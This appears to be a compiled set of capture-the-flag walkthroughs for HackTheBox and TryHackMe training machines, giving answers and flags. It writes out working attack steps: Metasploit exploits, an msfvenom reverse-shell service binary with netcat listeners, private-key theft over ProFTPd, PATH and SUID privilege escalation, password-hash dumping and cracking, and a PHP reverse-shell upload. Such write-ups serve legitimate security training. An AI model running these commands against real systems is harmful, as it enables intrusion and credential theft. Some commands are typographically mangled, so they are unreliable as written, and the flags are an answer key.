What does the 3-letter acronym FTP stand for?

» Ans: File Transfer Protocol

Task 2

Which port does the FTP service listen on usually?

» Ans: 21

Task 3

FTP sends data in the clear, without any encryption. What acronym is used for a later protocol designed to provide similar functionality to FTP but securely, as an extension of the SSH protocol?

» Ans: SFTP

Task 4

What is the command we can use to send an ICMP echo request to test our connection to the target?

» Ans: Ping

Task 5

From your scans, what version is FTP running on the target?

nmap -sV -T4 10.129.14.204

» Ans: vsftpd 3.0.3

Task 6

From your scans, what OS type is running on the target?

» Ans: Unix

Task 7

What is the command we need to run in order to display the 'ftp' client help menu?

» Ans: ftp ?

Task 8

What is username that is used over FTP when you want to log in without having an account?

» Ans: Anonymous

Task 9

What is the response code we get for the FTP message 'Login successful'?

» Ans: 230

Task 10

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.

» Ans: ls

Task 11

What is the command used to download the file we found on the FTP server?

» Ans: get

Submit Flag

Submit root flag

» Ans: 035db21c881520061c53e0536e44f815

What does the acronym VM stand for?

» Ans: Virtual Machine

Task 2

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It's also known as a console or shell.

» Ans: Terminal

Task 3

What service do we use to form our VPN connection into HTB labs?

» Ans: OpenVPN

Task 4

What tool do we use to test our connection to the target with an ICMP echo request?

» Ans: Ping

Task 5

What is the name of the most common tool for finding open ports on a target?

» Ans: Nmap

Task 6

What service do we identify on port 23/tcp during our scans?

» Ans: Telnet

nmap -sC -sV -Pn -T4 10.129.144.163

Task 7

What username is able to log into the target over telnet with a blank password?

» Ans: root

Submit Flag

Submit root flag

» Ans: b40abdfe23665f766f9c61ecba8a4c19

• Hack into a Mr. Robot themed Windows machine. Use Metasploit for initial access, utilize Powershell for Windows PrivEsc enumeration and learn a new technique to get Administrator access.

Task 1: Introduction

• Target IP: 10.10.200.57

http://10.10.200.57

• The first question wants us to answer the following:

Who is the employee of the month?

• To save you a lot of time and frustration of finding Bill’s last name, simply right click and select “View Page Source”. You should find the following:

<img src=”/img/BillHarper.png” style=”width:200px;height:200px;”/>

Q: Who is the employee of the month?

A: Bill Harper

Task 2: Initial Access

• Let’s start by gleaning some information about the IP using Nmap.

nmap -O -sV -sC — script vuln -oN steel.nmap 10.10.200.57

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — Coffee break☕ — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

• After scanning and offloading the output to a file named “steel.nmap” so I can use for reference later , we learn that the following ports are open:

Open port enumeration results

Q: Scan the machine with nmap. What is the other port running a web server on?

A: 8080

• Since we’ve already taken a look at the first webserver running on port 80, let’s take a look at port 8080.

http://10.10.200.57:8080

• The important information given here is located on the bottom left of the page. Select the HttpFileServer 2.3 hyperlink to learn who the vendor is.

Vendor: rejetto

Q: Take a look at the other web server. What file server is running?

A: Rejetto HTTP File Server

• With the information that we’ve gathered thus far, we can either use the Exploit-DB website to find any CVE’s that can be used to exploit this server, use the CLI searchsploit command, or we can interact with msfconsole’s local Metasploit framework module database. I’ll be using the searchsploit command to enumerate the exploit along with its CVE number.

Enumerating the CVE. Any of the listed exploits should return the same CVE number.

Q: What is the CVE number to exploit this file server?

A: 2014–6287

Discovered one vulnerability.

• Within Metasploit you can run the following to gain a meterpreter session:

use 0

set RHOSTS 10.10.200.57

set RPORT 8080

set LPORT 9090

run

meterpreter session started.

• Once we reach our meterpreter session we’ll find that we are located in the following directory path:

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

• cd back to C:\Users\bill\Desktop to find your flag.

Q: Use Metasploit to get an initial shell. What is the user flag?

A: b04763b6fcf51fcd7c13abc7db4fd365

Task 3: PrivEsc

• Now, we will escalate our privileges to root.

LOLBins!

Download the raw file.

Create a new terminal and place the downloaded .ps1 file into the following path for upload to meterpreter shell.

• Follow the THM instructions:

upload completed.

• Run the following commands within the meterpreter shell:

load powershell

powershell_shell

Powershell shell successfully loaded.

• At this point, what we are trying to do now is run the PowerUp.ps1 script to discover a vulnerability within bill’s system so we can escalate our privileges to root. We do this by finding a service that is running on his machine that is vulnerable to exploitation.

• Run the following:

Running PowerUp.ps1 to enumerate vulnerabilities.

Discovering the vulnerable service running on bill’s machine.

Q: Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

A: AdvancedSystemCareService9

• The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

• Now you may be asking, which infected program? With the power of msfvenom I can show you. The goal here is to create our own service that we can replace with the real vulnerable “ASCService.exe” running on bill’s machine, under the same service name, with a new infected payload executable generated by the msfvenom tool.

• Exit the Powershell shell (Ctrl + C) we don’t need this anymore because we’ve already used it for finding the vulnerable service running on bill’s machine. (We can stay in the PS shell and run commands from here, but we are going to move away from it in the write-up.

• Now, we can put our meterpreter session in the background and return to it later (Ctrl + Z). You can fully exit out of the session as well but then you’d have to reconnect which just takes longer. I will be putting it in the background so I can return to it in a bit. What I am going to focus on now is loading the msfvenom payload under the legit service name running on bill’s machine. This way, once the infected ASCService.exe is uploaded, we can masquerade it and swap it out for the vulnerable one.

Getting to where I want to start working w/ msfvenom.

• Run the following:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.200.57 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

Running msfvenom reverse shell payload and saving it as ASCService.exe

• Make sure your LHOST is set to whatever your local THM machine VPN IP is set to:

tun0 IP aka LHOST.

.exe downloaded location.

• Since my tailored/infected ASCService.exe is located in my /root folder. My meterpreter shell should upload from this specific path. See the following for guidance:

uploading the .exe from the downloaded location.

• Also take note to upload from C:\Users\bill. Uploading from other paths may deny you access.

• Now, it is time to replace the legitimate service with our infected one.

• Drop down a Windows shell by running:

shell

Dropping down into a Windows shell.

• Stop the legitimate process running on bill’s machine:

sc stop AndvancedSystemCareService9

AdvancedSystemCareService9 stopped so we can swap.

Appropriate paths copied and swapped.

• Copy the file and start a separate terminal to listen on via Netcat.

• Run the following:

nc -lvnp 4443

Starting AdvancedSystemCareService9 w/ swapped out ASCService.exe.

listening in via Netcat using port 4443.

• Make sure to listen first before starting the service.

• Navigate to C:\Users\Administrator\Desktop\root.txt to get the flag.

Obtaining the root flag!

Q: What is the root flag?

A: 9af5f314f57607c00fd09803a587db80

Congratulations!

• Enumerate Samba for shares, manipulate a vulnerable version of ProFTPd and escalate your privileges with path variable manipulation.

Task 1: Deploy the Vulnerable Machine

• Scan the machine.

nmap -sC -sV 10.10.133.242

http://10.10.133.242

Q: Scan the machine with nmap, how many ports are open?

A: 7

/admin.html disallowed entry.

http://10.10.133.242/admin.html — This should look familiar.

Task 2: Enumerating Samba for Shares

Samba Bg:

• Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a companies intranet or internet. Its often referred to as a network file system.

• Samba is based on the common client/server protocol of Server Message Block (SMB). SMB is developed only for Windows, without Samba, other computer platforms would be isolated from Windows machines, even if they were part of the same network.

Port 139 and 445.

nmap -p 445 — script=smb-enum-shares.nse,smb-enum-users.nse 10.10.133.242

Enumerating Samba shares.

Q: Using the nmap command above, how many shares have been found?

A: 3

Failed attempt at fuzzing for outstanding directories.

• Connect to the machine’s network share.

smbclient //10.10.133.242/anonymous

When asked for a password do not give up. Try pressing “Enter” :)

Q: Once you’re connected, list the files on the share. What is the file you can see?

A: log.txt

smbget -R smb://10.10.133.242/anonymous

• Open the file on the share.

• View log.txt and find what port FTP is running on.

Q: What port is FTP running on?

A: 21

• Our earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.

nmap -p 111 — script=nfs-ls,nfs-statfs,nfs-showmount 10.10.133.242

Enumerating port 111 to access network file system and view mount point.

Q: What mount can we see?

A: /var

Task 3: Gain Initial Access with ProFTPd

ProFTPd Bg:

• ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

• Use Netcat to connect to the machine on the FTP port.

nc 10.10.133.242 21

Running nc to glean information on ProFTPd’s version.

Q: What is the version?

A: 1.3.5

• Use Searchsploit to find exploits for proFTPd 1.3.5 version of software.

Searchsploit Bg:

• Searchsploit is a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. (https://www.exploit-db.com/).

searchsploit proftpd 1.3.5

Running Searchsploit.

Q: How many exploits are there for the ProFTPd running?

A: 4

• Copy Kenobi’s private key using SITE CPFR (Copy File From Remote) and SITE CPTO (Copy File To Remote) commands.

Using SITE CPFR and SITE CPTO commands.

• We know that the /var directory was a mount we could see (when we used: nmap -p 111 — script=nfs-ls,nfs-statfs,nfs-showmount 10.10.2.185) so we’ve now moved Kenobi’s private key to the /var/tmp directory.

• Now we can mount the /var/tmp directory to our machine.

mkdir /mnt/kenobiNFS
mount 10.10.2.185:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

Mounting.

• Now that we have a network mount on our deployed machine, we can go to /var/tmp and get the private key and then login to Kenobi’s account.

cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.2.185

Getting the Private Key and logging into Kenobi’s account.

Task 4: Privilege Escalation with Path Variable Manipulation

• Understanding what SUID, SGID and Sticky Bits are:

• Running the following to search the system for other custom files that could have the SUID bit.

find / -perm -u=s -type f 2>/dev/null

Locating path/binary.

Q: What file looks particularly out of the ordinary?

A: /usr/bin/menu

Running the binary.

Q: Run the binary, how many options appear?

A: 3

• Run the following:

strings /usr/bin/menu

• This tells us that as the file runs with root user privileges, we can manipulate our path to gain a root shell.

• As this file runs as the root users privileges, we can manipulate our path to gain a root shell.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH

Manipulating our path to gain a root shell.

Gaining root shell and discovering flag.

• We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary, which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!

Q: What is the root flag (/root/root.txt)?

A: 177b3cd8562289f37382721c28381f02

Congratulations!

• Deploy and hack into a Windows machine, leveraging common misconfigurations issues.

Task 1: Recon

• Scan the machine.

nmap -sV -sC — script vuln -oN blue.nmap 10.10.147.79

Q: How many ports are open with a port number under 1000?

A: 3

Scanning the machine using NSE vulnerability script.

Q: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

A: ms17–010

Vulnerable to ms17–010 aka “EternalBlue”.

Task 2: Gain Access

• Start Metasploit.

msfconsole

search ms17–010

Use 0 name/description to answer next question.

Q: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

A: exploit/windows/smb/ms17_010_eternalblue

• Run the following:

use 0

show options

set RHOSTS 10.10.147.79

run

Q: Show options and set the one required value. What is the name of this value? (All caps for submission)

A: RHOSTS

• I think it’s important to note that things do not always pan out or work out the way you expect they might 100% of the time. Take the screenshots taken below for instance. Both brought me to a meterpreter shell with elevated privileges, however one gave me an error and one responded “WIN”. The outcome was the same but the journey was different.

Error to meterpreter.

WIN to meterpreter.

Task 3: Escalate

These steps can be skipped if you already reached meterpreter and escalated privileges.

• Run the following:

shell

whoami

• Drop down a shell and verify you are actually running at “NT AUTHORITY\SYSTEM”. (Use (Ctrl + z) to return to meterpreter session.)

• Run the following:

ps

migrate 1276 (migrating to spoolsv.exe) (Process is not always the same but should typically be in the same general range/start with 12xx.)

getuid (verify you are still in NT AUTHORITY\SYSTEM while in meterpreter.)

• The meterpreter session that you start out with is not always the most stable. If you can, migrate to the spoolsv.exe process. This is the printer process, and it always runs with NT AUTHORITY\SYSTEM. It will also always match the architecture of the system. If you kill this it will respawn and it won’t break your system.

Task 4: Cracking

hashdump

• Copy and paste Jon’s full hash into a file name of your choice into a new terminal not in meterpreter (mine is jripper.hash).

touch jripper.hash

gedit jripper.hash

john jon.hash — format=NT — wordlist=/usr/share/wordlists/rockyou.txt

john jon.hash — show — format=NT

• Ensure your individual path leads to your rockyou.txt location within your filesystem. This location is not universal and may be found somewhere else.

jripper.hash output w/ cracked password.

Q: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

A: Jon

Q: Copy this password hash to a file and research how to crack it. What is the cracked password?

A: alqfna22

Task 5: Find Flags!

Q: Flag1? This flag can be found at the system root.

A: flag{access_the_machine}

Location: C:\

Q: Flag 2? \Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.*

A: flag{sam_database_elevated_access}

Location: C:\windows\system32\config

Q: flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

A: flag{admin_documents_can_be_valuable}

Location: C:\users\jon\documents

Congratulations!

• Learn about active recon, web app attacks and privilege escalation.

Task 1: Deploy The Machine

• Here we will simply deploy the machine by selecting[Start Machine] labeled in green, and then select [Start AttackBox] at the top labeled in blue.

Task 2: Reconnaissance

• After deployment, we now have a machine that we can target and attack. We see the following information:

Title, IP Address, Expires.

• The piece I am concerned with here is the IP Address. In order to gather more information about the machine, we can use the network scanning tool Nmap (Network Mapper) to gain some more insight into the target host.

• To scan the target machine, one command we can run is nmap -sV. This command will probe the hosts’ open ports, and attempt to determine It’s service/version information. My IP Address for my given machine in this session is 10.10.224.64 so we’ll stick with that.

nmap -sV 10.10.224.64

Nmap Bg:

• Nmap is a free, open-source and powerful tool used to discover hosts (computers) and services on a computer network. In our example, we are using Nmap to scan this machine (with the IP Address: 10.10.224.64) to identify all services running on a particular port. (Keep in mind: ports are really just a landing area for a specific protocol. SSH runs on 22 while HTTP runs on 80, and so on.)

• Nmap has many capabilities; the table below summarises some of its functionality for your reference:

Nmap Flag scan descriptions.

• After the scan is completed, we glean the following information:

You should see something like this.

• What this tells us is that we have discovered 6 ports that are actively open. This information will help us answer the following questions:

Q: Scan the box; how many ports are open?

A: 6

Q: What version of the squid proxy is running on the machine?

A: 3.5.12

Q: How many ports will Nmap scan if the flag -p-400 was used?

A: 400

Q: What is the most likely operating system this machine is running?

A: Ubuntu

Q: What port is the web server running on?

A: 3333

(Note: After running [nmap -sV 10.10.224.64] we see “Apache” which is indeed a webserver.)

Q: What is the flag for enabling verbose mode using Nmap?

A: -v

Task 3: Locating Directories Using Gobuster

• With Gobuster, what we are going to do is to locate a directory within the webapp that isn’t supposed to be there (i.e discover a vulnerability) and use this to our advantage to upload a reverse shell that will call back for us to accept the invite and get into the webserver itself..

• Here’s a table that summarizes some of Gobuster’s functionality:

Gobuster Flag scan descriptions.

• What we are told to do in the room is to run the following:

gobuster dir -u http://10.10.224.64:3333

• That part we can understand. What we are trying to do here is to use the Gobuster tool to search for directories within the provided URL. Easy enough. However, we need to know what we want to look for. That’s where wordlists come in. The room tells us that a word list set can be found under the following directory within the AttackBox:

/usr/share/wordlists/dirbuster/directory-list-1.0.txt

• If you traverse your way through the directories into the .txt file you will see a list of words used to see if anything in the webapp directories stick under the 10.10.224.64 IP.

• The complete command you should run is as follows:

gobuster dir -u 10.10.224.64 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

• Here is the output we should receive:

• Take note that /internal/ is the only directory that is out of the ordinary. All other directories are to be expected on a public-facing website. If you add /internal/ to the http extension (e.g http://10.10.224.64:3333/internal/) it displays an upload page for uploading files.)

Q: What is the directory that has an upload form page?

A: /internal/

http://10.10.224.64:3333/internal/ file upload page.

• Now, even though we have discovered the webpage, we don’t have to stop there. In the FireFox browser if you go to extensions and search for “Wappalyzer”, you can install and enable the extension. This will allow you to glean some insight into how the site was built and what file types it may or may not allow. Since we are the aggressor, naturally we want to uncover what file types are allowed so as to use that against the site.

Task 4: Compromise the Webserver

• Now that we have found a form to upload files, we can leverage this to upload and execute our payload, which will lead to compromising the web server.

• The room wants us to “fuzz” the upload form and try some file type extensions on it to see if it will take. Instead of using BurpSuite, we could just try the 5 different php file extensions and see which one gets through and which ones get blocked. After a little bit of trial and error, you will come to find that the .phtml extension is the only file type that is allowed which we will use for our payload.

Q: What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.

A: .php

(Note: .php is a file type you would want to upload because it would allow you to upload source code in order to exploit the server.)

Q: Run this attack, what extension is allowed?

A: .phtml

• Now that we know this, we can use the given “php-reverse-shell” from the following URL:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

• Select, “Copy raw file” on the top right-hand side and paste it into a .phtml of your choosing. I’ve gone ahead and named mine, “twistcut.phtml”. (This mind you, is all being done inside of the THM AttackBox).

• After you paste the reverse shell code into a file, you want to make sure to change the tun0 ip, by going to http://10.10.10.10 in the browser of your TryHackMe connected device. This will display a flag and your VPN/TryHackMe IP of: (in my case) 10.10.90.23. Now, when you are looking at your php-reverse-shell code within your twistcut.phtml file, you want to ensure that you use that tun0 ip and input into the “$ip:” slot. Now you can save and exit.

• (Note: Make sure you insert the tun0 ip and now the target machine ip. If you do the former it will not work.)

• Now in your terminal, you want to type the following command to listen in on when you submit the .phtml payload file. Run the following command in the terminal:

nc -lvnp 1234

• Go to the upload page and submit the “twistcut.phtml” file. Once you do, you’ll want to add the /uploads/twistcut.html to the end of the URL to successfully hack into the webserver. The URL should read:

http://10.10.65.1:3333/internal/uploads/twistcut.phtml

• If you look back at your terminal you’ll find that you are in and have successfully taken control of the webserver. In order to get the next two flags, you will want to run the following or a variation of the following:

ls*, **cd home*, *ls*, *cd bill*, *ls*, *cat user.txt**.*

• This will give you both flags required to continue down the room.

Q: What is the name of the user who manages the webserver?

A: bill

Q: What is the user flag?

A: 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: PrivEsc

• Next, you want to bring in code from a tool called, “LinPEAS”. This tool is specifically designed for linux machines and its purpose is to run a script that will search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. Essentially, it will show you what might be vulnerable and highlight it for you so you can escalate your privileges and move even further into the webserver host.

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

• After running LinPEAS you will find that “/bin/systemctl” stands out the most of the SUID files. This answers the question:

Q: On the system, search for all SUID files. Which file stands out?

A: /bin/systemctl

• Now that we know that particular path is vulnerable, we can use a tool called “GTFOBins”. This tool is a “curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems”. Perfect, because we know exactly what we are looking for. Enter [+SUID] into the search bar and look for “systemctl” as you scroll down. Follow the instructions it gives you and run the program using its original path. It should look something like this:

cd /tmp

eop=$(mktemp).service

echo “[Service]

ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”

[Install]

WantedBy=multi-user.target’ > $eop

/bin/systemctl link $eop

/bin/systemctl enable — now $eop

From here you should be good to go, navigate your way through the /tmp/output directories to find the output and receive your final flag!

Q: Become root and get the last flag (/root/root.txt)

A: a58ff8579f0a9270368d33a9966c7fd5

Congratulations!